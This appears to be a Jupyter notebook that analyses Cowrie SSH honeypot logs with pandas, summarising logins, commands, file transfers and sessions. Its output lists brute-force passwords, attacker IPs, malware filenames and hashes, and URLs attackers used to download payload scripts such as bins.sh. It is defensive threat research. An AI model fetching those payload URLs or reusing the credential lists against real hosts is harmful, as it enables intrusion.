# Cowrie Honeypot Log Analysis

Reference blog post: https://medium.com/@pedrinazzim/weekend-plan-cowrie-honeypot-log-analysis-afd707f801f6

This notebook has the purpose to simplify the analysis of the Cowrie Honeypot logs in case the honeypot is not configured to send data to an ELK-stack, Splunk, etc. The analysis of Cowrie logs is structured in 5 categories. Each category contains a subset of the event ids that cowrie honeypot can log and overall the five categories contain all the possible event ids.
The categories are the following:
- Logins
- Commands
- File uploads and downloads
- Sessions
- Misc

**This notebook requires the following API:**
```
- IPInfo (IP map Report)
```

**This notebook works with the following packages:**
```
- os
- pandas
- datetime
- requests
- folium
```

Upload all your logs files in a folder (I used `cowrie` as a name but you can change it as you like) and watch Jupyter do a bit of magic ;)

If you prefer to do the analysis in another way, the .csv files for every event id that cowrie can log are saved as well.

In [41]:
import os
import pandas as pd
from datetime import datetime
import requests
import folium

Let's start working on the logs. Create a dataframe and .csv with all the events given multiple .json files (I assumed the file naming format of `<filename>.json` for the today's date and `<filename>.json.<today's date - 1> `for yesterday and so on)

In [42]:
# Define the folder containing the JSON files
folder_path = 'cowrie'

# List all JSON files in the folder
json_files = os.listdir(folder_path)

# Sort files by date (assuming date is part of the filename in format 'YYYY-MM-DD')
json_files.sort(key=lambda x: datetime.strptime(x.split('.')[-1], '%Y-%m-%d') if '-' in x else datetime.today())
print(json_files)

# Read and merge the JSON files into a single DataFrame
df = pd.concat(
    [pd.read_json(os.path.join(folder_path, file), lines = True) for file in json_files],
    ignore_index=True
)

# Display the resulting DataFrame
df.to_csv('all_events.csv', index=False, escapechar='\\')

print(f"Number of events: {df.shape[0]}")
print("The 10 IPs with most events associated with:")
print(df['src_ip'].value_counts().head(10).to_markdown())

['cowrie.json.2024-12-13', 'cowrie.json.2024-12-14', 'cowrie.json']
Number of events: 8104
The 10 IPs with most events associated with:
| src_ip         |   count |
|:---------------|--------:|
| 87.120.127.241 |    3127 |
| 176.109.92.170 |    1417 |
| 37.44.238.68   |     556 |
| 83.222.191.62  |     500 |
| 2.57.122.195   |     316 |
| 139.59.208.44  |     305 |
| 178.160.195.60 |     232 |
| 195.178.110.67 |     189 |
| 159.89.181.166 |     172 |
| 2.57.122.194   |     161 |


Filter the dataframe for event types (https://cowrie.readthedocs.io/en/latest/OUTPUT.html) and export the result to CSV

In [43]:
# Shared attributes
shared_attributes = ['message', 'sensor', 'timestamp', 'src_ip', 'session']

# Event-specific attributes
event_attributes = {
    'cowrie.client.fingerprint': ['username', 'fingerprint', 'key', 'type'],
    'cowrie.login.success': ['username', 'password'],
    'cowrie.login.failed': ['username', 'password'],
    'cowrie.client.size': ['width', 'height'],
    'cowrie.session.file_upload': ['filename', 'outfile', 'shasum'],
    'cowrie.command.input': ['input'],
    'cowrie.virustotal.scanfile': ['sha256', 'is_new', 'positives', 'total'],
    'cowrie.session.connect': ['src_ip', 'src_port', 'dst_ip', 'dst_port'],
    'cowrie.client.version': ['version'],
    'cowrie.client.kex': ['hassh', 'hasshAlgorithms', 'kexAlgs', 'keyAlgs'],
    'cowrie.session.closed': ['duration'],
    'cowrie.log.closed': ['duration', 'ttylog', 'size', 'shasum', 'duplicate'],
    'cowrie.direct-tcpip.request': ['dst_ip', 'dst_port', 'src_ip', 'src_port'],
    'cowrie.direct-tcpip.data': ['dst_ip', 'dst_port'],
    'cowrie.client.var': ['name', 'value'],
    'cowrie.session.file_download': ['url','outfile','shasum'],
    'cowrie.session.params': ['arch'],
    'cowrie.command.failed': ['input']
}

# Function to filter and highlight attributes
def filter_event_data(df, eventid, shared_attributes, event_attributes):
    specific_attributes = event_attributes.get(eventid, [])
    columns_to_select = shared_attributes + specific_attributes
    columns_to_select = list(dict.fromkeys(columns_to_select)) #used to remove duplicate src_ip in cowrie.direct-tcpip.request events
    columns_to_select = [col for col in columns_to_select if col in df.columns]  # Ensure columns exist
    return df[df['eventid'] == eventid][columns_to_select]

# Filter data for each event
filtered_data = {}
for eventid in event_attributes.keys():
    filtered_data[eventid] = filter_event_data(df, eventid, shared_attributes, event_attributes)
    print(f"Number events for {eventid}: {filtered_data[eventid].shape[0]}")

print("---")
# Export filtered data to csv
for eventid, data in filtered_data.items():
    num_events = data.shape[0]
    if num_events > 0:
      data.to_csv(f"{eventid}_filtered.csv", index=False, escapechar='\\')
      print(f"Data for {eventid} exported to {eventid}_filtered.csv")
    else:
      print(f"No events found for {eventid}; skipping export.")

Number events for cowrie.client.fingerprint: 1
Number events for cowrie.login.success: 248
Number events for cowrie.login.failed: 1139
Number events for cowrie.client.size: 3
Number events for cowrie.session.file_upload: 42
Number events for cowrie.command.input: 219
Number events for cowrie.virustotal.scanfile: 0
Number events for cowrie.session.connect: 1558
Number events for cowrie.client.version: 1442
Number events for cowrie.client.kex: 1425
Number events for cowrie.session.closed: 1558
Number events for cowrie.log.closed: 211
Number events for cowrie.direct-tcpip.request: 8
Number events for cowrie.direct-tcpip.data: 6
Number events for cowrie.client.var: 0
Number events for cowrie.session.file_download: 27
Number events for cowrie.session.params: 211
Number events for cowrie.command.failed: 6
---
Data for cowrie.client.fingerprint exported to cowrie.client.fingerprint_filtered.csv
Data for cowrie.login.success exported to cowrie.login.success_filtered.csv
Data for cowrie.login.f

## Logins

Analysis of the succeeded and failed logins

### cowrie.login.success

Logins succeeded. The code below prints:
- the total number of events for this event id
- the most frequent usernames and password used by threat actor in succeeded login attemps (limited to 10)
- The 10 IPs with the highest number of login attemps
- all the data related to this event id

In [44]:
# Number of rows
num_rows_login_ok = filtered_data['cowrie.login.success'].shape[0]
if num_rows_login_ok > 0:
  # The 10 most frequent usernames
  most_frequent_usernames_login_ok = filtered_data['cowrie.login.success']['username'].value_counts().head(10)

  # The 10 most frequent password
  most_frequent_passwords_login_ok = filtered_data['cowrie.login.success']['password'].value_counts().head(10)

  # Number of interactions per IP (filter top 10)
  ip_interactions_login_ok = filtered_data['cowrie.login.success']['src_ip'].value_counts().head(10)

  print(f"Number of logins succeded: {num_rows_login_ok}")
  print("---")
  print("The 10 most frequent usernames used by threat actors")
  print(most_frequent_usernames_login_ok.to_markdown())
  print("---")
  print("The 10 most frequent passwords used by threat actors")
  print(most_frequent_passwords_login_ok.to_markdown())
  print("---")
  print("Top 10 source IPs with the highest number of login attemps succeeded:")
  print(ip_interactions_login_ok.to_markdown())
  print("---")
  print("Filtered data for 'cowrie.login.success':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.login.success'].to_markdown())

Number of logins succeded: 248
---
The 10 most frequent usernames used by threat actors
| username   |   count |
|:-----------|--------:|
| root       |     248 |
---
The 10 most frequent passwords used by threat actors
| password                |   count |
|:------------------------|--------:|
|                         |      14 |
| admin                   |      10 |
| ubnt                    |       8 |
| password                |       6 |
| 0                       |       6 |
| kjashd123sadhj123dhs1SS |       5 |
| toor                    |       4 |
| ftpuser                 |       4 |
| 12345678                |       4 |
| ------fuck------        |       4 |
---
Top 10 source IPs with the highest number of login attemps succeeded:
| src_ip         |   count |
|:---------------|--------:|
| 87.120.127.241 |      91 |
| 176.109.92.170 |      60 |
| 37.44.238.68   |      18 |
| 178.160.195.60 |      10 |
| 87.120.113.231 |       7 |
| 45.148.10.203  |       6 |
| 46.19.143.66   |

### cowrie.login.failed

Logins failed. The code below prints:
- the total number of events for this event id
- the most frequent usernames and password used by threat actor in failed logins (limited to 10)
- The 10 IPs with the highest number of login attemps
- all the data related to this event id

In [45]:
# Number of rows
num_rows_login_fail = filtered_data['cowrie.login.failed'].shape[0]
if num_rows_login_fail > 0:
  # The 10 most frequent usernames
  most_frequent_usernames_login_fail = filtered_data['cowrie.login.failed']['username'].value_counts().head(10)

  # The 10 most frequent passwords
  most_frequent_passwords_login_fail = filtered_data['cowrie.login.failed']['password'].value_counts().head(10)

  # Number of interactions per IP (filter top 10)
  ip_interactions_login_fail = filtered_data['cowrie.login.failed']['src_ip'].value_counts().head(10)

  print(f"Number of logins failed: {num_rows_login_fail}")
  print("---")
  print("Most frequent username used by threat actors")
  print(most_frequent_usernames_login_fail.to_markdown())
  print("---")
  print("Most frequent password used by threat actors")
  print(most_frequent_passwords_login_fail.to_markdown())
  print("---")
  print("Top 10 source IPs with the highest number of login attemps failed:")
  print(ip_interactions_login_fail.to_markdown())
  print("---")
  print("Filtered data for 'cowrie.login.failed':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.login.failed'].to_markdown())

Number of logins failed: 1139
---
Most frequent username used by threat actors
| username   |   count |
|:-----------|--------:|
| admin      |      33 |
| ubuntu     |      30 |
| ftpuser    |      30 |
| oracle     |      21 |
| debian     |      21 |
| steam      |      17 |
| test       |      16 |
| ubnt       |      15 |
| postgres   |      14 |
| solana     |      14 |
---
Most frequent password used by threat actors
| password   |   count |
|:-----------|--------:|
| 123456     |     166 |
| 123        |      45 |
| password   |      23 |
| admin      |      19 |
| 1          |      19 |
| ftpuser    |      16 |
| 12345678   |      16 |
| root       |      13 |
| ubnt       |      11 |
| 111111     |      10 |
---
Top 10 source IPs with the highest number of login attemps failed:
| src_ip         |   count |
|:---------------|--------:|
| 87.120.127.241 |     479 |
| 176.109.92.170 |     187 |
| 83.222.191.62  |     100 |
| 37.44.238.68   |      77 |
| 2.57.122.195   |      62 

## Commands

Analysis of the commands executed on the honeypot

### cowrie.command.input

The code below prints:
- the total number of events for this event id
- The most frequent command
- The IP with the highest number of interactions together with that number
- The IPs the executed more commands (limited to 10)
- all the data associated with this event id

In [46]:
# Number of rows
num_rows_commands = filtered_data['cowrie.command.input'].shape[0]
if num_rows_commands > 0:
  # Most frequent command
  most_frequent_command = filtered_data['cowrie.command.input']['input'].value_counts().idxmax()

  # Top 10 most frequent commands
  top10_commands = filtered_data['cowrie.command.input']['input'].value_counts().head(10)

  # IP with highest interactions
  most_interactive_ip_commands = filtered_data['cowrie.command.input']['src_ip'].value_counts().idxmax()

  # Number of interactions for the IP with highest interactions
  most_interactive_ip_count_commands = filtered_data['cowrie.command.input']['src_ip'].value_counts().max()

  # Number of interactions per IP (filter top 10)
  ip_interactions_commands = filtered_data['cowrie.command.input']['src_ip'].value_counts().head(10)

  print(f"Number of events: {num_rows_commands}")
  print(f"Most frequent command: {most_frequent_command}")
  print(f"IP with highest interactions: {most_interactive_ip_commands}, number of interactions: {most_interactive_ip_count_commands}")
  print("---")
  print("IPs that executed more commands (top 10)")
  print(ip_interactions_commands.to_markdown())
  print("---")
  print("Top 10 most frequent commands:")
  print(top10_commands.to_markdown())
  print("---")
  print("Filtered data for 'cowrie.command.input':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.command.input'].to_markdown())

Number of events: 219
Most frequent command: uname -s -v -n -r -m
IP with highest interactions: 87.120.127.241, number of interactions: 91
---
IPs that executed more commands (top 10)
| src_ip         |   count |
|:---------------|--------:|
| 87.120.127.241 |      91 |
| 176.109.92.170 |      60 |
| 37.44.238.68   |      18 |
| 46.19.143.66   |      10 |
| 59.9.168.196   |       8 |
| 87.120.113.231 |       7 |
| 45.148.10.203  |       6 |
| 94.103.125.7   |       6 |
| 195.178.110.67 |       4 |
| 2.57.122.194   |       3 |
---
Top 10 most frequent commands:
| input                                                                                                                                                                                                                                                                                                                                                                                                                                          

### cowrie.command.failed

Commands that failed their execution on Cowrie. The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [47]:
# Number of events
num_rows_command_failed = filtered_data['cowrie.command.failed'].shape[0]

print(f"Number of events: {num_rows_command_failed}")
print("---")
print("Filtered data for 'cowrie.command.failed':") #cut for the github
print("---cut for github version---")
#print(filtered_data['cowrie.command.failed'].to_markdown())

Number of events: 6
---
Filtered data for 'cowrie.command.failed':
---cut for github version---


## File Uploads and Downloads

Analysis of the files uploaded and downloaded to/from the honeypot

### cowrie.session.file_upload

File uploaded to Cowrie, generaly through SFTP or SCP or another way. The code below prints:
- the total number of events for this event id
- The number of uploads per IP
- a detailed view of the files uploaded
- all the data related to this event id

In [48]:
# Number of rows
num_rows_uploads = filtered_data['cowrie.session.file_upload'].shape[0]
if num_rows_uploads > 0:
  # Number of interactions per IP (filter top 10)
  ip_interactions_uploads = filtered_data['cowrie.session.file_upload']['src_ip'].value_counts().head(10)

  # Files uploaded view (shasum, srcip, filename)
  file_uploads_detail = filtered_data['cowrie.session.file_upload'].groupby(['shasum', 'src_ip', 'filename']).size().reset_index(name='count')

  print(f"Number of events: {num_rows_uploads}")
  print("---")
  print("Number of uploads per IP (top 10):")
  print(ip_interactions_uploads.to_markdown())
  print("---")
  print("Files uploaded (detailed view)")
  print(file_uploads_detail.to_markdown())
  print("---")
  print("Filtered data for 'cowrie.session.file_upload':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.session.file_upload'].to_markdown())

Number of events: 42
---
Number of uploads per IP (top 10):
| src_ip         |   count |
|:---------------|--------:|
| 87.120.113.231 |      42 |
---
Files uploaded (detailed view)
|    | shasum                                                           | src_ip         | filename       |   count |
|---:|:-----------------------------------------------------------------|:---------------|:---------------|--------:|
|  0 | 29f8524562c2436f42019e0fc473bd88584234c57979c7375c1ace3648784e4b | 87.120.113.231 | redtail.x86_64 |       7 |
|  1 | 3b15778595cef00d1a51035dd4fd65e6be97e73544cb1899f40aec4aaa0445ae | 87.120.113.231 | setup.sh       |       7 |
|  2 | 69dc9dd8065692ea262850b617c621e6c1361e9095a90b653b26e3901597f586 | 87.120.113.231 | redtail.i686   |       7 |
|  3 | 992cb5a753697ee2642aa390f09326fcdb7fd59119053d6b1bdd35d47e62f472 | 87.120.113.231 | redtail.arm8   |       7 |
|  4 | d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4 | 87.120.113.231 | redtail.arm7   |   

### cowrie.session.file_download

Files downloaded to Cowrie. The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [49]:
# Number of rows
num_rows_downloads = filtered_data['cowrie.session.file_download'].shape[0]
if num_rows_downloads > 0:
  # Files uploaded view (shasum, srcip, filename)
  file_downloads_detail = filtered_data['cowrie.session.file_download'].groupby(['shasum', 'src_ip', 'url']).size().reset_index(name='count')

  print(f"Number of events: {num_rows_downloads}")
  print("---")
  print("Files downloaded (detailed view)")
  print(file_downloads_detail.to_markdown())
  print("---")
  print("Filtered data for 'cowrie.session.file_download':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.session.file_download'].to_markdown())

Number of events: 27
---
Files downloaded (detailed view)
|    | shasum                                                           | src_ip       | url                          |   count |
|---:|:-----------------------------------------------------------------|:-------------|:-----------------------------|--------:|
|  0 | 1fa505863d5045330db30b33a7668683f28d6481ff899c782c1d9273d56766a2 | 37.44.238.68 | http://87.121.86.228/bins.sh |       9 |
|  1 | d1c5f8343f38273e6943502feb87d97ddbb19123fc3e6c0b891a1fb248ec4d30 | 37.44.238.68 | http://37.44.238.68/bins.sh  |      18 |
---
Filtered data for 'cowrie.session.file_download':
---cut for github version---


## Sessions

Analysis of the sessions

### cowrie.session.connect

New connection. The code below prints:
- the total number of events for this event id
- the 10 src IPs with the highest number of sessions started
- all the data related to this event id
- an IP map report where each IP is geo-located

In [50]:
# Number of events
num_rows_session_connect = filtered_data['cowrie.session.connect'].shape[0]
if num_rows_session_connect > 0:
  # Top 10 most frequent IP
  top10_sessions = filtered_data['cowrie.session.connect']['src_ip'].value_counts().head(10)

  print(f"Number of events: {num_rows_session_connect}")
  print("Top 10 src IPs with most sessions:")
  print(top10_sessions.to_markdown())
  #print(" ")
  print("---")
  print("Filtered data for 'cowrie.session.connect':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.session.connect'].to_markdown())

Number of events: 1558
Top 10 src IPs with most sessions:
| src_ip         |   count |
|:---------------|--------:|
| 87.120.127.241 |     571 |
| 176.109.92.170 |     248 |
| 83.222.191.62  |     100 |
| 37.44.238.68   |      95 |
| 2.57.122.195   |      65 |
| 139.59.208.44  |      61 |
| 178.160.195.60 |      47 |
| 195.178.110.67 |      36 |
| 159.89.181.166 |      35 |
| 60.191.20.210  |      31 |
---
Filtered data for 'cowrie.session.connect':
---cut for github version---


Get geolocation for each IP (replace `{YOUR-API-KEY}` with your IPinfo API key, get yours here https://ipinfo.io/) and create IP Map report

In [51]:
if num_rows_session_connect > 0:
  ip_addresses = list(filtered_data['cowrie.session.connect']['src_ip'].unique())
  print(f"Number of Unique IPs {len(ip_addresses)}")
  #print(ip_addresses)

  print("---")

  # Function to get geolocation data for an IP
  def get_geo_data(ip):
      url = f"https://ipinfo.io/{ip}?token={YOUR-API-KEY}"
      response = requests.get(url)
      if response.status_code == 200:
          return response.json()
      else:
          return {"error": f"Failed to fetch data for {ip}, status code {response.status_code}"}

  # Fetch and print geolocation data for all IPs
  geo_data = {}
  for ip in ip_addresses:
      geo_data[ip] = get_geo_data(ip)

  # Print the results, if you want to
  # for ip, data in geo_data.items():
  #   print(f"IP: {ip}, Data: {data}")

  # Create a base map
  m = folium.Map(location=[20, 0], zoom_start=2)

  # Add markers for each IP
  for ip, data in geo_data.items():
      if "loc" in data:
          lat, lon = map(float, data["loc"].split(","))
          folium.Marker(location=[lat, lon], popup=f"IP: {ip}").add_to(m)

  display(m)

Number of Unique IPs 124
---


### cowrie.session.closed

Information about the sessions closed. This code below tells you:
- the number of sessions closed
- the 10 IPs with the longest sessions
- and if you want to look at all the data, you can do it because the filtered dataframe for this event is printed

In [52]:
# Number of events
num_rows_session_closed = filtered_data['cowrie.session.closed'].shape[0]
if num_rows_session_closed > 0:
  # Find longest sessions
  # Sort the DataFrame by 'duration' in descending order to get the highest durations at the top
  sorted_df_sessions = filtered_data['cowrie.session.closed'].sort_values(by='duration', ascending=False)
  # Group by 'src_ip' and get the first row for each group (highest 'duration')
  top_10_src_ips_duration = sorted_df_sessions.groupby('src_ip').first()
  # Sort by 'duration' again to get the 10 highest durations across all src_ips
  top_10_src_ips_duration = top_10_src_ips_duration.sort_values(by='duration', ascending=False).head(10)

  print(f"Number of events: {num_rows_session_closed}")
  print("Top 10 src IPs with longest sessions:")
  print(top_10_src_ips_duration.to_markdown())
  #print(" ")
  print("---")
  print("Filtered data for 'cowrie.session.closed': ") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.session.closed'].to_markdown())

Number of events: 1558
Top 10 src IPs with longest sessions:
| src_ip          | message                             | sensor       | timestamp                        | session      |   duration |
|:----------------|:------------------------------------|:-------------|:---------------------------------|:-------------|-----------:|
| 117.83.194.85   | Connection lost after 182.1 seconds | 36ac07b4cb7d | 2024-12-15 06:47:28.888645+00:00 | 3e0d2d880423 |      182.1 |
| 154.218.13.200  | Connection lost after 120.1 seconds | d25a97e65075 | 2024-12-13 21:28:41.818277+00:00 | afa4107bbe9a |      120.1 |
| 39.129.23.197   | Connection lost after 120.1 seconds | 36ac07b4cb7d | 2024-12-14 17:23:51.876513+00:00 | a2f92943c392 |      120.1 |
| 47.108.137.159  | Connection lost after 120.1 seconds | 36ac07b4cb7d | 2024-12-15 01:22:53.306353+00:00 | 24811f0e5570 |      120.1 |
| 121.43.234.8    | Connection lost after 120.1 seconds | 36ac07b4cb7d | 2024-12-15 06:57:36.218472+00:00 | 5d4423adba71 | 

## Misc

Analysis of miscellaneous data

### cowrie.client.size

Width and height of the users terminal as communicated through the SSH protocol.
The code below prints:
- the total number of events for this event id
- the IP the the highest of number of interaction together with the exact number
- and if you want to look at all the data, you can do it because the filtered dataframe for this event is printed

In [53]:
# Number of rows
num_rows_client_size = filtered_data['cowrie.client.size'].shape[0]
if num_rows_client_size > 0:
  # IP with highest interactions
  most_interactive_ip_client_size = filtered_data['cowrie.client.size']['src_ip'].value_counts().idxmax()

  # Number of interactions for the IP with highest interactions
  most_interactive_ip_count_client_size = filtered_data['cowrie.client.size']['src_ip'].value_counts().max()

  print(f"Number of events: {num_rows_client_size}")
  print(f"IP with highest number of interactions: {most_interactive_ip_client_size}, number of interactions: {most_interactive_ip_count_client_size}")
  print("---")
  print("Filtered data for 'cowrie.client.size':")
  print("---cut for github version---")
  #print(filtered_data['cowrie.client.size'].to_markdown()) #---cut for github version---

Number of events: 3
IP with highest number of interactions: 94.103.125.7, number of interactions: 3
---
Filtered data for 'cowrie.client.size':
---cut for github version---


### cowrie.client.fingerprint

If the attacker attemps to log in with an SSH public key this is logged here.
The code below prints:
- the total number of events for this event id
- the IP the the highest of number of interaction together with the exact number
- and if you want to look at all the data, you can do it because the filtered dataframe for this event is printed

In [54]:
# Number of rows
num_rows_client_fingerprint = filtered_data['cowrie.client.fingerprint'].shape[0]
if num_rows_client_fingerprint > 0:
  # IP with highest interactions
  most_interactive_ip_client_fingerprint = filtered_data['cowrie.client.fingerprint']['src_ip'].value_counts().idxmax()

  # Number of interactions for the IP with highest interactions
  most_interactive_ip_count_client_fingerprint = filtered_data['cowrie.client.fingerprint']['src_ip'].value_counts().max()

  print(f"Number of events: {num_rows_client_fingerprint}")
  print(f"IP with highest interactions: {most_interactive_ip_client_fingerprint}, number of interactions: {most_interactive_ip_count_client_fingerprint}")
  print("---")
  print("Filtered data for 'cowrie.client.fingerprint':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.client.fingerprint'].to_markdown())

Number of events: 1
IP with highest interactions: 45.84.107.198, number of interactions: 1
---
Filtered data for 'cowrie.client.fingerprint':
---cut for github version---


### cowrie.client.version


SSH identification string. The code below prints:
- the total number of events for this event id
- the most frequent SSH version
- the IP the the highest of number of interaction together with the exact number
- and if you want to look at all the data, you can do it because the filtered dataframe for this event is printed

In [55]:
# Number of rows
num_rows_client_version = filtered_data['cowrie.client.version'].shape[0]
if num_rows_client_version > 0:
  # Most frequent SSH version
  most_frequent_ssh_version = filtered_data['cowrie.client.version']['version'].value_counts().idxmax()

  # IP with highest interactions
  most_interactive_ip_client_version = filtered_data['cowrie.client.version']['src_ip'].value_counts().idxmax()

  # Number of interactions for the IP with highest interactions
  most_interactive_ip_count_client_version = filtered_data['cowrie.client.version']['src_ip'].value_counts().max()

  print(f"Number of events: {num_rows_client_version}")
  print(f"Most frequent SSH version: {most_frequent_ssh_version}")
  print(f"IP with highest interactions: {most_interactive_ip_client_version}, number of interactions: {most_interactive_ip_count_client_version}")
  print("---")
  print("Filtered data for 'cowrie.client.versiont':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.client.version'].to_markdown())

Number of events: 1442
Most frequent SSH version: SSH-2.0-Go
IP with highest interactions: 87.120.127.241, number of interactions: 571
---
Filtered data for 'cowrie.client.versiont':
---cut for github version---


### cowrie.client.kex

SSH Key Exchange Attributes. The code below prints:
- the total number of events for this event id
- the most frequent HASSH
- the IP the the highest of number of interaction together with the exact number
- and if you want to look at all the data, you can do it because the filtered dataframe for this event is printed

In [56]:
# Number of rows
num_rows_kex = filtered_data['cowrie.client.kex'].shape[0]
if num_rows_kex > 0:
  # Most frequent HASSH
  most_frequent_hassh_version = filtered_data['cowrie.client.kex']['hassh'].value_counts().idxmax()

  # IP with highest interactions
  most_interactive_ip_kex = filtered_data['cowrie.client.kex']['src_ip'].value_counts().idxmax()

  # Number of interactions for the IP with highest interactions
  most_interactive_ip_count_kex = filtered_data['cowrie.client.kex']['src_ip'].value_counts().max()

  print(f"Number of events: {num_rows_kex}")
  print(f"Most frequent HASSH: {most_frequent_hassh_version}")
  print(f"IP with highest interactions: {most_interactive_ip_kex}, number of interactions: {most_interactive_ip_count_kex}")
  print("---")
  print("Filtered data for 'cowrie.client.kex':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.client.kex'].to_markdown())

Number of events: 1425
Most frequent HASSH: 5f904648ee8964bef0e8834012e26003
IP with highest interactions: 87.120.127.241, number of interactions: 571
---
Filtered data for 'cowrie.client.kex':
---cut for github version---


### cowrie.direct-tcpip.request

Request for proxying via the honeypot.
The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [57]:
# Number of rows
num_rows_direct_tcpip_request = filtered_data['cowrie.direct-tcpip.request'].shape[0]


print(f"Number of events: {num_rows_direct_tcpip_request}")
print("---")
print("Filtered data for 'cowrie.direct-tcpip.request':") #---cut for github version---
print("---cut for github version---")
#print(filtered_data['cowrie.direct-tcpip.request'].to_markdown())

Number of events: 8
---
Filtered data for 'cowrie.direct-tcpip.request':
---cut for github version---


### cowrie.direct-tcpip.data

Data attempted to be sent through direct-tcpip forwarding. The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [58]:
# Number of events
num_rows_direct_tcpipdata = filtered_data['cowrie.direct-tcpip.data'].shape[0]

print(f"Number of events: {num_rows_direct_tcpipdata}")
print("---")
print("Filtered data for 'cowrie.direct-tcpip.data':") #---cut for github version---
print("---cut for github version---")
#print(filtered_data['cowrie.direct-tcpip.data'].to_markdown())

Number of events: 6
---
Filtered data for 'cowrie.direct-tcpip.data':
---cut for github version---


### cowrie.virustotal.scanfile

File sent to VT for scanning. The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [59]:
# Number of events
num_rows_vt = filtered_data['cowrie.virustotal.scanfile'].shape[0]

print(f"Number of events: {num_rows_vt}")
print("---")
print("Filtered data for 'cowrie.virustotal.scanfile':") #---cut for github version---
print("---cut for github version---")
#print(filtered_data['cowrie.virustotal.scanfile'].to_markdown())

Number of events: 0
---
Filtered data for 'cowrie.virustotal.scanfile':
---cut for github version---


### cowrie.client.var

The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [60]:
# Number of events
num_rows_client_var = filtered_data['cowrie.client.var'].shape[0]

print(f"Number of events: {num_rows_client_var}")
print("---")
print("Filtered data for 'cowrie.client.var':") #---cut for github version---
print("------cut for github version------")
# print(filtered_data['cowrie.client.var'].to_markdown())

Number of events: 0
---
Filtered data for 'cowrie.client.var':
------cut for github version------


### cowrie.log.closed

TTY Log closed. The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [61]:
# Number of events
num_rows_log_closed = filtered_data['cowrie.log.closed'].shape[0]

print(f"Number of events: {num_rows_log_closed}")
print("---")
print("Filtered data for 'cowrie.log.closed':") #---cut for github version---
print("---cut for github version---")
#print(filtered_data['cowrie.log.closed'].to_markdown())

Number of events: 211
---
Filtered data for 'cowrie.log.closed':
---cut for github version---


### cowrie.session.params

Session params. The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [62]:
# Number of events
num_rows_session_params = filtered_data['cowrie.session.params'].shape[0]

print(f"Number of events: {num_rows_session_params}")
print("---")
print("Filtered data for 'cowrie.session.params':") #---cut for github version---
print("---cut for github version---")
# print(filtered_data['cowrie.session.params'].to_markdown())

Number of events: 211
---
Filtered data for 'cowrie.session.params':
---cut for github version---
